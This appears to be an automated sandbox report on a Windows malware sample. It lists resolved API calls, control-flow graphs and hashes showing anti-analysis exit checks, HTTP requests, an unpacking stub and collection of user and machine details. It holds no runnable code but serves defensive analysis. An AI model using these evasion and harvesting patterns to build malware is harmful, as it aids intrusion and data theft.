                                      • LoadLibraryA.KERNEL32(00880428,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                      • LoadLibraryA.KERNEL32(00880470,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                      • GetProcAddress.KERNEL32(75290000,00872F28), ref: 0041A0DA
                                      • GetProcAddress.KERNEL32(75290000,008804B8), ref: 0041A0F2
                                      • GetProcAddress.KERNEL32(75290000,008786C0), ref: 0041A10A
                                      • GetProcAddress.KERNEL32(75290000,00880488), ref: 0041A123
                                      • GetProcAddress.KERNEL32(75290000,00872F48), ref: 0041A13B
                                      • GetProcAddress.KERNEL32(6FC70000,0087CBD0), ref: 0041A160
                                      • GetProcAddress.KERNEL32(6FC70000,00872D48), ref: 0041A179
                                      • GetProcAddress.KERNEL32(6FC70000,0087CC20), ref: 0041A191
                                      • GetProcAddress.KERNEL32(6FC70000,008804A0), ref: 0041A1A9
                                      • GetProcAddress.KERNEL32(6FC70000,008804D0), ref: 0041A1C2
                                      • GetProcAddress.KERNEL32(6FC70000,00872EE8), ref: 0041A1DA
                                      • GetProcAddress.KERNEL32(6FC70000,00872C48), ref: 0041A1F2
                                      • GetProcAddress.KERNEL32(6FC70000,00880590), ref: 0041A20B
                                      • GetProcAddress.KERNEL32(752C0000,00872F08), ref: 0041A22C
                                      • GetProcAddress.KERNEL32(752C0000,00872E08), ref: 0041A244
                                      • GetProcAddress.KERNEL32(752C0000,00880650), ref: 0041A25D
                                      • GetProcAddress.KERNEL32(752C0000,008805A8), ref: 0041A275
                                      • GetProcAddress.KERNEL32(752C0000,00872F68), ref: 0041A28D
                                      • GetProcAddress.KERNEL32(74EC0000,0087CD60), ref: 0041A2B3
                                      • GetProcAddress.KERNEL32(74EC0000,0087CB80), ref: 0041A2CB
                                      • GetProcAddress.KERNEL32(74EC0000,00880608), ref: 0041A2E3
                                      • GetProcAddress.KERNEL32(74EC0000,00872C08), ref: 0041A2FC
                                      • GetProcAddress.KERNEL32(74EC0000,00872E48), ref: 0041A314
                                      • GetProcAddress.KERNEL32(74EC0000,0087CE78), ref: 0041A32C
                                      • GetProcAddress.KERNEL32(75BD0000,008805F0), ref: 0041A352
                                      • GetProcAddress.KERNEL32(75BD0000,00872D68), ref: 0041A36A
                                      • GetProcAddress.KERNEL32(75BD0000,00878640), ref: 0041A382
                                      • GetProcAddress.KERNEL32(75BD0000,00880620), ref: 0041A39B
                                      • GetProcAddress.KERNEL32(75BD0000,008805C0), ref: 0041A3B3
                                      • GetProcAddress.KERNEL32(75BD0000,00872E88), ref: 0041A3CB
                                      • GetProcAddress.KERNEL32(75BD0000,00872E68), ref: 0041A3E4
                                      • GetProcAddress.KERNEL32(75BD0000,00880638), ref: 0041A3FC
                                      • GetProcAddress.KERNEL32(75BD0000,008805D8), ref: 0041A414
                                      • GetProcAddress.KERNEL32(75A70000,00872EA8), ref: 0041A436
                                      • GetProcAddress.KERNEL32(75A70000,00880C80), ref: 0041A44E
                                      • GetProcAddress.KERNEL32(75A70000,00880BF0), ref: 0041A466
                                      • GetProcAddress.KERNEL32(75A70000,008809B0), ref: 0041A47F
                                      • GetProcAddress.KERNEL32(75A70000,00880C20), ref: 0041A497
                                      • GetProcAddress.KERNEL32(75450000,00872F88), ref: 0041A4B8
                                      • GetProcAddress.KERNEL32(75450000,00872EC8), ref: 0041A4D1
                                      • GetProcAddress.KERNEL32(75DA0000,00872FA8), ref: 0041A4F2
                                      • GetProcAddress.KERNEL32(75DA0000,00880B78), ref: 0041A50A
                                      • GetProcAddress.KERNEL32(6F070000,00872BC8), ref: 0041A530
                                      • GetProcAddress.KERNEL32(6F070000,00872BE8), ref: 0041A548
                                      • GetProcAddress.KERNEL32(6F070000,00872C28), ref: 0041A560
                                      • GetProcAddress.KERNEL32(6F070000,00880998), ref: 0041A579
                                      • GetProcAddress.KERNEL32(6F070000,00872C68), ref: 0041A591
                                      • GetProcAddress.KERNEL32(6F070000,00872C88), ref: 0041A5A9
                                      • GetProcAddress.KERNEL32(6F070000,00872CA8), ref: 0041A5C2
                                      • GetProcAddress.KERNEL32(6F070000,00872CC8), ref: 0041A5DA
                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                      • GetProcAddress.KERNEL32(75AF0000,00880BD8), ref: 0041A629
                                      • GetProcAddress.KERNEL32(75AF0000,00878610), ref: 0041A641
                                      • GetProcAddress.KERNEL32(75AF0000,00880C08), ref: 0041A659
                                      • GetProcAddress.KERNEL32(75AF0000,00880A40), ref: 0041A672
                                      • GetProcAddress.KERNEL32(75D90000,00872CE8), ref: 0041A693
                                      • GetProcAddress.KERNEL32(6E380000,00880BA8), ref: 0041A6B4
                                      • GetProcAddress.KERNEL32(6E380000,00872D08), ref: 0041A6CD
                                      • GetProcAddress.KERNEL32(6E380000,00880B48), ref: 0041A6E5
                                      • GetProcAddress.KERNEL32(6E380000,00880BC0), ref: 0041A6FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                      • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                      • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                      • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1030 406528-40652d 1010->1030 1013 406348-40634c 1011->1013 1014 4064ff-406503 InternetCloseHandle 1011->1014 1016 40635a 1013->1016 1017 40634e-406358 1013->1017 1014->1010 1019 406364-406392 HttpOpenRequestA 1016->1019 1017->1019 1020 4064f5-4064f9 InternetCloseHandle 1019->1020 1021 406398-40639c 1019->1021 1020->1014 1023 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1021->1023 1024 40639e-4063bf InternetSetOptionA 1021->1024 1026 406407-406427 call 41a740 call 41a800 * 2 1023->1026 1027 40642c-40644b call 418940 1023->1027 1024->1023 1026->1030 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1027->1035 1036 40644d-406454 1027->1036 1035->1030 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1020 1044->1045 1046 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1046 1045->1040 1046->1039
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                      • StrCmpCA.SHLWAPI(?,00882630), ref: 00406303
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                      • HttpOpenRequestA.WININET(00000000,GET,?,00881E28,00000000,00000000,00400100,00000000), ref: 00406385
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                      • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                      • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                      • InternetCloseHandle.WININET(00000000), ref: 00406503
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3074848878-2509457195
                                      • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                      • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                      • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                      • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1103 4118c0-4118c3 1074->1103 1104 4118ca 1074->1104 1105 4118e2-4118e5 1075->1105 1106 4118ec 1075->1106 1076->1070 1085 411904-411907 1077->1085 1086 41190e 1077->1086 1091 411964-411967 1078->1091 1092 41196e 1078->1092 1094 411983-411986 1079->1094 1095 41198d 1079->1095 1087 411930 1080->1087 1088 411926-411929 1080->1088 1089 411945-411948 1081->1089 1090 41194f 1081->1090 1082->1070 1099 411870-411873 1083->1099 1100 41187a 1083->1100 1101 411892-41189c 1084->1101 1102 41189e-4118a1 1084->1102 1085->1086 1086->1070 1087->1070 1088->1087 1089->1090 1090->1070 1091->1092 1092->1070 1094->1095 1095->1070 1099->1100 1100->1070 1110 4118a8 1101->1110 1102->1110 1103->1104 1104->1070 1105->1106 1106->1070 1110->1070
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID: block
                                      • API String ID: 3407564107-2199623458
                                      • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                      • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                      • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                      • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1154 415693-4156a9 call 41aad0 StrCmpCA 1129->1154 1158 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1158 1145->1154 1161 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1154->1161 1162 4156af-4156b6 1154->1162 1158->1154 1293 415ac3-415ac6 1161->1293 1165 4157da-41585f call 41aad0 StrCmpCA 1162->1165 1166 4156bc-4156c3 1162->1166 1186 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1165->1186 1187 415865-41586c 1165->1187 1167 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1166->1167 1168 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1166->1168 1167->1165 1168->1165 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1168->1271 1186->1293 1188 415872-415879 1187->1188 1189 41598f-415a14 call 41aad0 StrCmpCA 1187->1189 1195 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1188->1195 1196 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1188->1196 1218 415a16-415a21 Sleep 1189->1218 1219 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1189->1219 1195->1189 1297 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1195->1297 1196->1189 1218->1127 1219->1293 1271->1165 1297->1189
                                      APIs
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                        • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                        • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                      • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleepstrtok
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3630751533-2791005934
                                      • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                      • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                      • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                      • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                      • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                      • wsprintfA.USER32 ref: 00417640
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 3790021787-3809124531
                                      • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                      • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1344 230003c-2300047 1345 2300049 1344->1345 1346 230004c-2300263 call 2300a3f call 2300e0f call 2300d90 VirtualAlloc 1344->1346 1345->1346 1361 2300265-2300289 call 2300a69 1346->1361 1362 230028b-2300292 1346->1362 1367 23002ce-23003c2 VirtualProtect call 2300cce call 2300ce7 1361->1367 1364 23002a1-23002b0 1362->1364 1366 23002b2-23002cc 1364->1366 1364->1367 1366->1364 1373 23003d1-23003e0 1367->1373 1374 23003e2-2300437 call 2300ce7 1373->1374 1375 2300439-23004b8 VirtualFree 1373->1375 1374->1373 1377 23005f4-23005fe 1375->1377 1378 23004be-23004cd 1375->1378 1381 2300604-230060d 1377->1381 1382 230077f-2300789 1377->1382 1380 23004d3-23004dd 1378->1380 1380->1377 1386 23004e3-2300505 LoadLibraryA 1380->1386 1381->1382 1387 2300613-2300637 1381->1387 1384 23007a6-23007b0 1382->1384 1385 230078b-23007a3 1382->1385 1388 23007b6-23007cb 1384->1388 1389 230086e-23008be LoadLibraryA 1384->1389 1385->1384 1390 2300517-2300520 1386->1390 1391 2300507-2300515 1386->1391 1392 230063e-2300648 1387->1392 1394 23007d2-23007d5 1388->1394 1398 23008c7-23008f9 1389->1398 1395 2300526-2300547 1390->1395 1391->1395 1392->1382 1393 230064e-230065a 1392->1393 1393->1382 1397 2300660-230066a 1393->1397 1399 2300824-2300833 1394->1399 1400 23007d7-23007e0 1394->1400 1396 230054d-2300550 1395->1396 1403 23005e0-23005ef 1396->1403 1404 2300556-230056b 1396->1404 1405 230067a-2300689 1397->1405 1407 2300902-230091d 1398->1407 1408 23008fb-2300901 1398->1408 1406 2300839-230083c 1399->1406 1401 23007e2 1400->1401 1402 23007e4-2300822 1400->1402 1401->1399 1402->1394 1403->1380 1409 230056d 1404->1409 1410 230056f-230057a 1404->1410 1411 2300750-230077a 1405->1411 1412 230068f-23006b2 1405->1412 1406->1389 1413 230083e-2300847 1406->1413 1408->1407 1409->1403 1414 230059b-23005bb 1410->1414 1415 230057c-2300599 1410->1415 1411->1392 1416 23006b4-23006ed 1412->1416 1417 23006ef-23006fc 1412->1417 1418 2300849 1413->1418 1419 230084b-230086c 1413->1419 1427 23005bd-23005db 1414->1427 1415->1427 1416->1417 1421 230074b 1417->1421 1422 23006fe-2300748 1417->1422 1418->1389 1419->1406 1421->1405 1422->1421 1427->1396
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0230024D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: cess$kernel32.dll
                                      • API String ID: 4275171209-1230238691
                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction ID: 746ef3dcb69f921d4488a693262606992e45043278dd64e5b9135942425a71bd
                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction Fuzzy Hash: 80526B74A01229DFDB64CF58C994BACBBB5BF09304F1480D9E54DAB391DB30AA95CF24

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878BE8), ref: 004198A1
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C90), ref: 004198BA
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C00), ref: 004198D2
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C18), ref: 004198EA
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C30), ref: 00419903
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008785A0), ref: 0041991B
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00873288), ref: 00419933
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00873228), ref: 0041994C
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C60), ref: 00419964
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C78), ref: 0041997C
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00879DD8), ref: 00419995
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00879FE8), ref: 004199AD
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00873008), ref: 004199C5
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00879EB0), ref: 004199DE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                        • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                        • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                        • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                        • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                        • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                        • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                        • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                        • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                      • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                        • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                        • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                        • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                        • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                        • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                        • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                        • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
